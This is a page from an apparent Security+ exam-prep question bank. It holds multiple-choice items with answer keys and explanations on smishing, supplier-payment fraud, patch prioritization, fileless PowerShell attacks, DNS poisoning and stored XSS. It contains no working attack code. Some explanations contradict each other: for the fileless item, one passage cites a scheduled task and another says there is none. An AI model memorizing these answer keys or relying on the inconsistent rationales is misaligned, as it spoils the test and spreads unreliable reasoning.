Option B (Spear phishing) is wrong because spear phishing targets specific individuals or groups but does not exclusively focus on senior executives; it is a broader category that includes whaling as a subset. Option C (Vishing) is wrong because vishing uses voice calls or VoIP to deceive victims, not email-based messages. Option D (Pharming) is wrong because pharming redirects users from legitimate websites to fraudulent ones by manipulating DNS or host files, not by sending deceptive emails.

220
MCQmedium

A procurement clerk receives a text message from someone claiming to be a supplier account manager. The message says a recent payment failed and asks the clerk to update bank details through a link to a secure portal. What should the clerk do first?

A.Open the link and compare it with the supplier's branding
B.Reply to the text and ask the sender to confirm the request
C.Verify the request using a known supplier contact method before taking action
D.Forward the message to finance so they can decide whether it is legitimate
AnswerC

Out-of-band verification through a trusted phone number or established contact path is the safest way to confirm legitimacy.

Why this answer

Option C is correct because the clerk should independently verify the request using a known supplier contact method (e.g., a phone number on file) before taking any action. This prevents falling victim to a social engineering attack, such as a phishing or business email compromise (BEC) attempt, where the attacker spoofs the sender's identity to redirect payments. Verifying through an out-of-band channel ensures the request is legitimate, as the link in the message could lead to a credential-harvesting site or malware download.

Exam trap

The trap here is that candidates may choose Option D, thinking that forwarding to finance is a safe escalation, but the SY0-701 exam emphasizes that the first step is always independent verification using a trusted method, not delegating or relying on the suspicious communication channel.

How to eliminate wrong answers

Option A is wrong because opening the link and comparing branding is unsafe; the link could lead to a lookalike domain that mimics the supplier's portal, and merely comparing branding does not verify the sender's identity or the link's authenticity, as attackers can easily replicate logos and styles. Option B is wrong because replying to the text allows the attacker to continue the social engineering; the reply goes to the same compromised channel, and the attacker can simply confirm the request, providing no real verification. Option D is wrong because forwarding the message to finance shifts responsibility without verifying the request first; finance may also be deceived by the same spoofed message, and the clerk should independently verify before escalating.

221
MCQhard

Based on the exhibit, which issue should be remediated FIRST? The team can only fully fix one issue today. Management wants the choice that best reduces real-world risk, not just the highest severity score.

A.Internet-facing VPN appliance
B.Internal HR file server
C.Lab workstation
D.DMZ reporting server
AnswerA

This asset is externally reachable, has a known public exploit, and lacks compensating controls. That combination creates the highest immediate likelihood of compromise.

Why this answer

The Internet-facing VPN appliance is the highest priority because it is directly exposed to untrusted networks (the Internet), making it the most likely entry point for attackers. A compromise here could lead to full network access, bypassing all other security controls, which represents the greatest real-world risk regardless of its severity score.

Exam trap

The trap here is that candidates often fixate on the highest CVSS severity score (e.g., a critical vulnerability on the internal server) rather than considering the attack surface and likelihood of exploitation, which is the core of risk-based prioritization.

How to eliminate wrong answers

Option B (Internal HR file server) is wrong because it resides on the internal network and is not directly reachable from the Internet, so its exposure is limited to already-authenticated users; remediating it first would not reduce external attack surface. Option C (Lab workstation) is wrong because it is isolated in a lab environment, typically with restricted network access and no sensitive production data, making its compromise low-impact. Option D (DMZ reporting server) is wrong because while it is in a DMZ, it is not Internet-facing (it is behind the firewall and only accessible from internal or specific external sources), so its risk is lower than a directly exposed VPN gateway.

222
MCQhard

Based on the exhibit, what is the most likely explanation for the suspicious workstation activity?

A.Ransomware campaign
B.Fileless attack
C.Worm propagation
D.Rootkit persistence
AnswerB

The exhibit shows legitimate Windows tools launching hidden, encoded PowerShell from a scheduled task, with no dropped executable on disk. That pattern strongly suggests a fileless attack, where the payload runs primarily in memory and uses trusted utilities to reduce visibility. The periodic connections after execution also fit a lightweight backdoor or loader rather than a traditional malware binary.

Why this answer

The exhibit shows a PowerShell command that downloads and executes a payload directly in memory without writing to disk. This is a classic indicator of a fileless attack, where malicious code runs in volatile memory (e.g., via PowerShell, WMI, or macros) to evade traditional file-based antivirus detection. The use of `Invoke-Expression` (IEX) with a remote URL confirms the attack vector is fileless.

Exam trap

The trap here is that candidates see a PowerShell command and assume it is a worm or ransomware, but the key detail is the in-memory execution (no file written) which is the hallmark of a fileless attack, not the payload's ultimate goal.

How to eliminate wrong answers

Option A is wrong because ransomware typically encrypts files and leaves ransom notes, but the exhibit shows no evidence of file encryption or ransom demands—only a suspicious PowerShell download cradle. Option C is wrong because worm propagation requires self-replicating code that spreads across networks without user interaction, whereas the exhibit shows a single command executed on one workstation with no lateral movement indicators. Option D is wrong because rootkit persistence involves hiding processes or files at the kernel level (e.g., via driver hooks or MBR modification), but the exhibit shows a one-time in-memory execution with no persistence mechanism like scheduled tasks or registry run keys.

223
MCQhard

A facilities manager receives an SMS from "FedEx Delivery" saying a shipment for the research lab cannot clear security until the recipient verifies the package by signing in. The message includes the manager's initials and the warehouse code, and the link opens a cloned sign-in page. Which attack is most likely?

A.Smishing, because the attacker is using a text message to deliver a targeted credential lure.
B.Vishing, because the attacker is pretending to be a delivery service representative.
C.Spear phishing, because the message is targeted using the recipient's role and location.
D.Baiting, because the message offers a shipment verification reward to encourage action.
AnswerA

Smishing is the best answer because the attack arrives by SMS and is designed to push the victim to a fake login page. The personalized details make it more convincing, but the defining factor is the text-message delivery channel combined with credential harvesting. This is a common real-world approach for bypassing inbox filtering and exploiting mobile trust.

Why this answer

Smishing is a social engineering attack that uses SMS (Short Message Service) to deliver a fraudulent message designed to trick the recipient into revealing sensitive information. In this scenario, the attacker sends a text message impersonating FedEx, includes the manager's initials and warehouse code for personalization, and provides a link to a cloned sign-in page, which is the classic credential-harvesting mechanism of a smishing attack.

Exam trap

The trap here is that candidates confuse the targeted nature of the message (which suggests spear phishing) with the delivery vector (SMS), but the exam specifically tests the distinction between phishing subtypes based on the communication channel used.

How to eliminate wrong answers

Option B is wrong because vishing (voice phishing) involves a phone call, not an SMS text message; the attack described uses a text message with a link, not a voice call. Option C is wrong because spear phishing is a form of email-based phishing that targets a specific individual or organization; while the message is targeted, the delivery method is SMS, not email, making smishing the more precise classification.

224
MCQmedium

A resolver log shows multiple clients querying the correct internal host name, but the DNS server starts returning an unexpected public IP address after a burst of unsolicited DNS responses from outside the network. Users are sent to a lookalike login page. What type of attack is most likely occurring?

A.DNS poisoning
B.Brute-force authentication
C.Port scanning
D.Packet sniffing
AnswerA

DNS poisoning is the best fit when incorrect DNS records or forged responses cause clients to resolve a legitimate name to a malicious address.

Why this answer

The scenario describes a DNS poisoning (also known as DNS cache poisoning) attack. The burst of unsolicited DNS responses from outside the network is the attacker injecting forged DNS records into the resolver's cache, causing it to map the correct internal host name to an unexpected public IP address. This redirects users to a lookalike login page, which is the classic outcome of DNS poisoning.

Exam trap

The trap here is that candidates may confuse DNS poisoning with packet sniffing because both involve network traffic, but only DNS poisoning actively modifies cached resolution data to redirect users.

How to eliminate wrong answers

Option B is wrong because brute-force authentication involves repeatedly trying passwords against a login interface, not manipulating DNS responses to redirect traffic. Option C is wrong because port scanning is used to discover open ports on a target system, not to alter DNS resolution or redirect users to a fake site. Option D is wrong because packet sniffing passively captures network traffic for analysis, but it does not inject forged DNS responses or modify the resolver's cache.

225
MCQmedium

A company portal lets employees save a short profile bio. One employee enters a string containing script code, and later other users who view that profile are redirected to a fake sign-in page. What vulnerability best explains this behavior?

A.Reflected cross-site scripting, because the payload only appears in the current request response.
B.Stored cross-site scripting, because the malicious script is saved and served to other users later.
C.Command injection, because the script runs inside the web server process.
D.Session fixation, because the attacker wants the victim to use an old session ID.
AnswerB

Stored XSS occurs when malicious script is persisted by the application, such as in a profile field, comment, or message. Every user who later loads the page receives the harmful content. The redirection to a fake sign-in page shows that the script is executing in other users’ browsers, which makes this a stored, not reflected, attack. Proper output encoding and input handling are needed to prevent it.

Why this answer

The employee's profile bio is saved to the server and later served to other users who view the profile. This is the defining characteristic of stored (persistent) cross-site scripting (XSS): the malicious script is permanently stored on the target server and executed in the browsers of other users when they retrieve the stored data.

Exam trap

The trap here is confusing stored XSS with reflected XSS by focusing on the 'current request' aspect rather than recognizing that the payload is saved and served to other users later, which is the key differentiator.

How to eliminate wrong answers

Option A is wrong because reflected XSS requires the payload to be part of the current request (e.g., in a URL parameter or form input) and is not permanently stored; it only affects the user who submits the request. Option C is wrong because command injection targets the server-side operating system by injecting system commands (e.g., via shell metacharacters like ';' or '|'), not client-side script execution in a browser.

← PreviousPage 3 of 4 · 265 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Threats Vulnerabilities questions.